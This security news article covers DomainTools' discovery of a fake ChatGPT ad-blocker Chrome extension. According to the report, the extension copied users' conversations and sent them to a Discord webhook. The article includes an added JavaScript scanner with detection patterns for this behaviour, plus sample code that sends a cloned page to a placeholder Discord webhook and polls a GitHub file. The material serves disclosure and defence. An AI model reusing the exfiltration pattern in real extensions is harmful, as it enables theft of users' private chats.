As OpenAI introduces adverts for its free-tier users, a new wave of scams is already looking to cash in. DomainTools, a team of internet infrastructure monitors, has identified a malicious Chrome extension titled ChatGPT Ad Blocker, which was available on the official Google Chrome Web Store as recently as 10 February 2026. While users thought they were simply blocking ads from their screens, the extension was actually keeping an eye on their conversations with the ChatGPT AI chatbot.
The trick is simple but effective. When a user opens ChatGPT, the extension executes a process called cloning the DOM. In simple words, it creates a copy of everything on the page and then filters out images and styles to focus purely on the text (your private prompts and the AI’s answers).
According to DomainTools’ investigation, the extension flagged any text longer than 150 characters and sent the entire conversation to a private channel on the messaging app Discord. The data was intercepted by a bot, interestingly named Captain Hook, which stored the stolen conversations for the hackers to read later.
To keep the operation hidden, the tool checked a GitHub file every hour for new instructions, allowing the attackers to change their tactics remotely without the user ever suspecting a thing.
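The three behaviours described above (DOM cloning on ChatGPT pages, a Discord webhook as the exfiltration channel, and a GitHub-hosted instruction file) can be looked for statically when reviewing an unpacked extension. The following is an added example, not code from DomainTools or from the extension itself; the `scanExtension` name, the regex heuristics, the GitHub raw-content hostnames and the sample file contents are assumptions constructed for illustration.

```javascript
// Heuristic indicators for the behaviours the article describes.
// These patterns are assumptions, not DomainTools' published signatures.
const INDICATORS = [
  { id: 'chatgpt-scope', why: 'runs on ChatGPT pages',
    re: /chatgpt\.com|chat\.openai\.com/i },
  { id: 'dom-clone', why: 'copies the whole page DOM',
    re: /document\.(?:documentElement|body)\.cloneNode\s*\(\s*true\s*\)/ },
  { id: 'discord-webhook', why: 'sends data to a Discord webhook',
    re: /discord(?:app)?\.com\/api\/webhooks\//i },
  { id: 'remote-config', why: 'pulls instructions from a GitHub-hosted file',
    re: /(?:raw|gist)\.githubusercontent\.com/i },
];

// files: { "relative/path": "file contents" } read from an unpacked extension.
function scanExtension(files) {
  const findings = [];
  for (const [file, text] of Object.entries(files)) {
    for (const ind of INDICATORS) {
      if (ind.re.test(text)) findings.push({ file, id: ind.id, why: ind.why });
    }
  }
  const ids = new Set(findings.map((f) => f.id));
  // Page access combined with an outbound webhook is the pattern reported
  // for this extension; any single hit still deserves a manual look.
  const verdict = ids.has('chatgpt-scope') && ids.has('discord-webhook')
    ? 'high' : findings.length ? 'review' : 'clean';
  return { verdict, findings };
}

// Constructed sample inputs (placeholders, not the real extension's code).
const SAMPLE_SUSPICIOUS = {
  'manifest.json': '{"content_scripts":[{"matches":["https://chatgpt.com/*"]}]}',
  'content.js': "const copy = document.body.cloneNode(true); " +
    "send('https://discord.com/api/webhooks/EXAMPLE_ID/EXAMPLE_TOKEN', copy);",
  'background.js': "setInterval(() => fetch('https://raw.githubusercontent.com/" +
    "EXAMPLE_USER/EXAMPLE_REPO/main/config.json'), 3600000);",
};
const SAMPLE_COSMETIC = {
  'manifest.json': '{"content_scripts":[{"matches":["https://chatgpt.com/*"]}]}',
  'content.js': "document.querySelectorAll('.ad').forEach((n) => n.remove());",
};

for (const [name, files] of Object.entries({ SAMPLE_SUSPICIOUS, SAMPLE_COSMETIC })) {
  const { verdict, findings } = scanExtension(files);
  console.log(name, verdict, findings.map((f) => `${f.file}:${f.id}`).join(', '));
}
```

Note that even the cosmetic sample is rated `review`: any extension granted access to ChatGPT pages can read the conversation, which is the article's point about third-party middlemen.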
Links to major AI apps
The developer accused of running this malicious extension goes by the online handle of krittinkalra, and is not a random hacker; they are also linked to popular AI platforms Writecream and AI4ChatCo, which claim to have over 1.5 million users.
“This identified activity appears to be positioning to take advantage of the dramatic shift in OpenAI’s policy to serve up advertisements to its free tier users by distributing malicious Chrome extensions alleging to block ChatGPT ads. Specifically, the extension’s primary purpose is data harvesting, stealing the full conversation structure, user prompts, and metadata, and exfiltrating it via a Discord webhook. Again, it begs the question, does the risk extend to other apps created by the same developer?” the DomainTools blog post reads.
While there is currently no proof that these other apps are stealing data, the developer’s sudden move from harmless phone software to data-stealing malware has raised serious alarms. For your information, the account had been inactive for five years before suddenly resurfacing with this malicious tool. It could be that their account was compromised to spread the malicious extension.
The cost of ‘free’
Researchers have also linked the scam to several suspicious websites, including blockaiads.com, openadblock.com, and gptadblock.com. Further probing revealed that the stolen data includes not just the chats themselves, but also technical metadata and the state of the user’s interface. While ads are annoying, having your private chats and business data broadcast to a stranger is a far higher price to pay.
DomainTools suggests that the safest way to avoid ads is through official settings, as any third-party “middleman” app is perfectly placed to listen in on your most private conversation. For now, you should treat any tool linked to this developer with suspicion.

